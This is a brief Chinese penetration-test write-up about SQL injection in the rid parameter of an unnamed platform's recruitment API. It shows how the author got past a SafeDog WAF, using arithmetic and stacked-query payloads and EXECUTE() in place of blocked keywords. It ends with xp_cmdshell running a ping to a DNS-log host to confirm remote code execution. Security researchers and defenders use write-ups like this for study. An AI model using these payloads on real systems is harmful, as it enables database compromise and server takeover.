某平台存在绕waf的sql注入导致rce

某平台存在sql注入导致rce
image.png

发现修改为2603-1页面不变

id=2602 → 返回 A 内容

id=2602-1 → 返回和 2601 一样的内容

image.png

后续发现实际接口为

/API/Web/Recruit.ashx?action=info&rid=

这个rid就是id值
可通过 rid 参数注入 SQL 语句
接下来我测试
rid=2602'
image.png

发现为数据库层报错直接回显

后放入sqlmap跑发现存在waf直接被封ip

手注被拦截
存在安全狗waf
image.png

哈哈哈哈

最后发现直接

rid=2602+SYSTEM_USER → 回显

rid=2602+USER → 回显

rid=2602+DB_NAME() → 回显

image.png

而后发现还存在堆叠注入
rid=2602;select 1/0

image.png

发现报错第二条

但是由于存在waf会拦截很多显眼关键字

对 exec/declare/xp_cmdshell/... 明显有关键字拦截

后发现可以通过特定语法(如 EXECUTE(...))绕过部分拦截

测试发现不存在回显

就测试无回显采用dnslog证明rce

测试rid=2602;EXECUTE('master..xp_cmdshell ''ping -n 4 dnslog''')

image.png

成功执行命令
image.png

温馨提示:本文内容仅用于合法授权的安全学习与研究交流,严禁用于未授权渗透测试、漏洞利用或任何违法行为。

涉及企业或平台的未公开漏洞信息,请遵循负责任披露原则,勿公开传播可直接复现的敏感细节。

如存在侵权、错误信息或不当内容,请联系站方处理,我们将及时核实并删除。邮箱:admin@baimaojianghu.com。